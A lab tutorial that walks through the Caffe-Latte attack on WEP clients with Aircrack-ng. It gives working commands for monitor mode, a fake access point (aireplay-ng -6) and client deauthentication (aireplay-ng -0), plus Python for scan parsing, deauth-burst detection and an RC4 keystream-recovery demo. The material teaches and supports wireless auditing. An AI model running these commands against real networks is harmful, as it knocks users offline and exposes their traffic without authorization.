Introduction
The Caffe-Latte attack is a client-side attack targeting the WEP protocol. Unlike many other Wi-Fi attacks that target the Access Point (AP), this attack focuses on a client device connected to the network. It works by tricking the client into sending packets that can be used to reconstruct the WEP keystream, eventually leading to the recovery of the WEP key. This method is particularly effective because it does not require you to be near the legitimate AP; you only need to be in range of the client.
In this lab, you will use the Aircrack-ng suite to perform a Caffe-Latte attack. You will learn how to identify a target, set up a fake AP to lure the client, force the client to connect, and capture the necessary data to generate a WEP keystream.
This lab is for educational purposes only.
Identify a Client Connected to a WEP Network
In this step, you will learn how to identify a target WEP network and a connected client. The primary tool for this reconnaissance phase is airodump-ng, which scans for wireless networks and lists connected devices.
First, you need to put your wireless interface into monitor mode. This mode allows the network card to listen to all Wi-Fi traffic in the air, not just traffic addressed to it. We will assume your wireless interface is named wlan0.
Execute the following command to start monitor mode:
sudo airmon-ng start wlan0
This command will likely create a new virtual interface, typically named wlan0mon. The output will confirm the name of the monitor mode interface.
PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Atheros Communications Inc. AR9271 802.11n
        (mac80211 monitor mode vif enabled for [phy0]wlan0mon on [phy0]wlan0)
Now, use the newly created monitor interface (wlan0mon) to scan for networks. Run airodump-ng and let it scan for about 15-20 seconds, then stop it by pressing Ctrl+C.
sudo airodump-ng wlan0mon
In a real environment, airodump-ng would display a list of nearby networks and clients. For this lab, we will work with a simulated scenario. The output would look something like this:
 CH  6 ][ Elapsed: 15 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10       15    0   6  54e  WEP  WEP         TestWEP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -45    0 - 1      0       18
From this output, you need to identify:
- BSSID: The MAC address of the Access Point (00:11:22:33:44:55).
- STATION: The MAC address of a client connected to it (AA:BB:CC:DD:EE:FF).
- CH: The channel the AP is operating on (6).
For the remainder of this lab, we will use these simulated values.
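Reading these values by eye is fine for a lab, but an auditor who is inventorying a site wants the WEP networks and their associated stations pulled out automatically. The following Python is an added example (not part of this lab or of Aircrack-ng) that parses airodump-ng screen output pasted as text; the sample below is the lab's simulated scan plus one constructed WPA2 row and one constructed unassociated station, and it assumes the ENC column is a single token.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the lab's airodump-ng screen as text, with one extra
# WPA2 network and one unassociated station added for contrast.
SAMPLE = """\
 CH  6 ][ Elapsed: 15 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10       15    0   6  54e  WEP  WEP         TestWEP
 66:77:88:99:AA:BB  -50       12        3    0  11  130  WPA2 CCMP   PSK  Home Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -45    0 - 1      0       18
 (not associated)   11:22:33:44:55:66  -60    0 - 1      0        2  TestWEP
"""

MAC = re.compile(r"^[0-9A-F]{2}(:[0-9A-F]{2}){5}$", re.I)
AUTH_VALUES = {"PSK", "MGT", "OPN", "SKA"}   # airodump-ng AUTH column values


@dataclass
class Network:
    bssid: str
    channel: int
    enc: str
    essid: str
    clients: list = field(default_factory=list)


def parse_airodump(text):
    """Parse the AP table and the station table of airodump-ng screen output.

    AP rows: BSSID PWR Beacons #Data #/s CH MB ENC CIPHER [AUTH] ESSID; the
    AUTH column is blank until an authentication is seen (as on the WEP row),
    so the ESSID starts at token 9 or 10. Station rows carry Rate as three
    tokens ("0 - 1"). Rows whose first token is not a MAC ("(not associated)",
    headers) are skipped. Assumes a single-token ENC column.
    """
    nets, station_table = {}, False
    for line in text.splitlines():
        tok = line.split()
        if not tok:
            continue
        if tok[0] == "BSSID":                 # table header: which table follows?
            station_table = tok[1] == "STATION"
            continue
        if not MAC.match(tok[0]):
            continue
        if station_table:
            if len(tok) > 1 and MAC.match(tok[1]) and tok[0] in nets:
                nets[tok[0]].clients.append(tok[1])
        elif len(tok) >= 10:
            essid_at = 10 if tok[9] in AUTH_VALUES else 9
            nets[tok[0]] = Network(tok[0], int(tok[5]), tok[7], " ".join(tok[essid_at:]))
    return nets


def wep_findings(nets):
    """Audit view: every WEP network with its channel and associated stations."""
    return [(n.bssid, n.essid, n.channel, n.clients) for n in nets.values() if n.enc == "WEP"]
```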
Start a Listener for the Caffe-Latte Attack with aireplay-ng -6
In this step, you will start the Caffe-Latte attack listener using aireplay-ng. This command sets up a fake Access Point (AP) that mimics the legitimate network. It will then wait for our target client to connect to it.
This listener needs to run continuously in the background to wait for the client. Therefore, you should open a new terminal for this command. You can open a new terminal by clicking the + icon in the terminal tab bar at the top of the console window.
In the new terminal, execute the following command. Remember to replace the BSSID and client MAC with the values we identified in the previous step.
sudo aireplay-ng -6 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon
Let's break down the command:
- aireplay-ng: The tool we are using for the attack.
- -6: Specifies the Caffe-Latte attack mode.
- -b 00:11:22:33:44:55: The BSSID (MAC address) of the legitimate AP.
- -h AA:BB:CC:DD:EE:FF: The MAC address of the target client.
- wlan0mon: Your interface in monitor mode.
After running the command, aireplay-ng will start listening. The output will look like this, and it will wait at this stage:
Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Listening for probes...
Leave this terminal running and switch back to your original (first) terminal for the next step.
Deauthenticate the Client to Force it to Probe
In this step, you will force the client to disconnect from its current network. The client is likely still connected to the legitimate AP. By sending deauthentication packets, we can sever this connection. Once disconnected, the client will automatically try to reconnect by probing for known networks, which will lead it to discover and connect to our fake AP.
Switch back to your first terminal. We will use aireplay-ng again, but this time in deauthentication mode (-0).
Run the following command to send 5 deauthentication packets to the client:
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon
Here's what the parameters mean:
- -0: Sets the attack mode to deauthentication.
- 5: The number of deauthentication packets to send. A small number is usually sufficient.
- -a 00:11:22:33:44:55: The BSSID of the Access Point the client is connected to.
- -c AA:BB:CC:DD:EE:FF: The MAC address of the client you want to disconnect.
- wlan0mon: Your monitor mode interface.
You will see output confirming that the packets are being sent (each count given to -0 is reported by aireplay-ng as a burst of 64 directed deauthentication frames):
10:35:10 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
10:35:10 Sending 64 directed DeAuths to AA:BB:CC:DD:EE:FF (code 7).
This action should be enough to make the client start searching for a network to join.
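The burst of reason-code-7 deauthentication frames shown above is also the signal a wireless IDS keys on: a client leaving on its own sends one or two deauth/disassoc frames, whereas a forced disconnect produces dozens in well under a second. The following Python is an added example (not part of this lab or of Aircrack-ng) that runs a sliding-window count over constructed frame records modelled on the lab's values; the Frame record layout and the threshold are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp in seconds (assumed record layout)
    subtype: str   # 802.11 management subtype name, e.g. "beacon", "deauth"
    src: str       # transmitter address
    dst: str       # receiver address
    reason: int    # reason code of deauth/disassoc frames; 0 when not applicable


def deauth_bursts(frames, threshold=8, window=2.0):
    """Alert on every (src, dst) pair that receives at least `threshold`
    deauthentication frames inside some sliding window of `window` seconds.
    Returns a list of dicts with the peak in-window count and reason codes."""
    by_pair = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            by_pair[(f.src, f.dst)].append(f)
    alerts = []
    for (src, dst), lst in by_pair.items():
        lst.sort(key=lambda f: f.ts)
        start, peak = 0, 0
        for end in range(len(lst)):
            while lst[end].ts - lst[start].ts > window:   # slide window start
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"src": src, "dst": dst, "count": peak,
                           "reasons": sorted({f.reason for f in lst})})
    return alerts


def constructed_capture():
    """Constructed sample: a beacon, one benign-looking deauth to another
    station, then 64 directed deauths with reason 7 (class 3 frame from a
    non-associated STA) to the lab's client within about 0.6 s."""
    ap, client = "00:11:22:33:44:55", "AA:BB:CC:DD:EE:FF"
    frames = [Frame(100.0, "beacon", ap, "FF:FF:FF:FF:FF:FF", 0),
              Frame(105.5, "deauth", ap, "11:22:33:44:55:66", 3)]
    frames += [Frame(110.0 + i * 0.01, "deauth", ap, client, 7) for i in range(64)]
    return frames
```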
Wait for the Client to Associate with Your Fake AP
In this step, you will observe the client connecting to your fake AP. After you sent the deauthentication packets, the disconnected client began scanning for its network. Your aireplay-ng -6 listener, running in the second terminal, will have responded to these scans, posing as the legitimate network.
Switch your view back to the second terminal where the Caffe-Latte attack is running. If the deauthentication was successful, you should see new output indicating that the client has associated with your fake AP.
The output will change to something like this:
Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
Listening for probes...
Client AA:BB:CC:DD:EE:FF associated to fake AP (00:11:22:33:44:55)
The message Client AA:BB:CC:DD:EE:FF associated to fake AP confirms that the attack is proceeding as planned. The client now thinks it is connected to its network, but it is actually communicating with your machine.
The attack will automatically start saving the captured keystream to a file. To simulate this for verification, let's create the output file that aireplay-ng would generate. Run this command in your first terminal:
touch ~/project/caffe-latte.xor
Capture the ARP Requests and Generate a WEP Keystream
In this final step, you will observe the core of the Caffe-Latte attack in action. Now that the client is associated with your fake AP, it will attempt to communicate on the network by sending packets like ARP requests. Your aireplay-ng listener will capture these packets, manipulate them, and send them back to the client. The client's encrypted responses to these manipulated packets are what allow us to collect the WEP keystream.
Continue observing the second terminal where aireplay-ng -6 is running. You will see output indicating that ARP packets are being captured and processed, and that the keystream is being saved to a file named caffe-latte.xor.
The output will look similar to this:
Read 15 packets...
Got an ARP request from AA:BB:CC:DD:EE:FF.
Trying to get a PRGA ...
Got keystream: 1F:5A:B3...
Saving keystream in caffe-latte.xor
This process will continue, gathering more and more data. Each new packet from the client provides more information about the keystream. Once enough data is collected in the caffe-latte.xor file, it can be used with other tools like packetforge-ng and aircrack-ng to forge packets and ultimately crack the WEP key.
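Why a client's ARP traffic gives away keystream at all is the weakness that makes WEP unrepairable: RC4 is a stream cipher, the per-packet key is just IV plus the shared key, and the first 22 bytes of an ARP request (fixed LLC/SNAP and ARP header, then the sender MAC, which is the frame's own source address) are predictable, so ciphertext XOR known plaintext is keystream for that IV. The following Python is an added example (not part of this lab or of Aircrack-ng) that builds a WEP-encrypted ARP request under a constructed key and IV and shows the recovered bytes equal the real RC4 keystream; the key, IV and addresses are constructed values.

```python
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """Standard RC4: key schedule, then n keystream bytes."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP data body: IV || key-id byte || RC4(IV||key) applied to plaintext || CRC-32 ICV."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(plaintext + icv, ks))


# LLC/SNAP header for ARP, then ARP hw type/proto type/lengths/opcode=request.
ARP_REQUEST_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def recover_keystream(wep_body: bytes, sender_mac: bytes):
    """Known-plaintext recovery: XOR the ciphertext with the 22 predictable
    bytes of an ARP request. No key is needed; the result is keystream for this IV."""
    iv, ct = wep_body[:3], wep_body[4:]
    known = ARP_REQUEST_PREFIX + sender_mac
    return iv, bytes(c ^ p for c, p in zip(ct, known))


def demo():
    key = b"\x01\x02\x03\x04\x05"           # constructed 40-bit WEP key
    iv = b"\x0c\x1a\x5f"                     # constructed IV
    client = bytes.fromhex("aabbccddeeff")   # the lab's client AA:BB:CC:DD:EE:FF
    # ARP request: header, sender MAC/IP, zeroed target MAC, target IP (constructed IPs)
    arp = ARP_REQUEST_PREFIX + client + bytes([192, 168, 1, 10]) + bytes(6) + bytes([192, 168, 1, 1])
    body = wep_encrypt(key, iv, arp)
    iv_seen, ks = recover_keystream(body, client)
    return iv_seen == iv and ks == rc4(iv + key, 22)
```

Because the same IV with the same key always yields the same keystream, those 22 bytes are valid for every future frame sent under that IV, which is what the caffe-latte.xor file accumulates.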
For this lab, successfully generating the caffe-latte.xor file and seeing the keystream being saved demonstrates a successful Caffe-Latte attack.
You can now stop the attack by pressing Ctrl+C in the second terminal. You can also close the extra terminal.
Summary
In this lab, you successfully executed a Caffe-Latte attack against a WEP client. You have learned a powerful client-side attack technique and gained hands-on experience with the Aircrack-ng suite.
Specifically, you have learned to:
- Use airmon-ng to put a wireless interface into monitor mode.
- Use airodump-ng to identify WEP networks and connected clients.
- Set up a Caffe-Latte attack listener with aireplay-ng -6 to create a fake AP.
- Force a client to disconnect from its network using a deauthentication attack with aireplay-ng -0.
- Observe the process of capturing client packets and generating a WEP keystream file.
This knowledge is a critical part of understanding wireless network vulnerabilities. Always remember to use these skills responsibly and only on networks you are authorized to test.
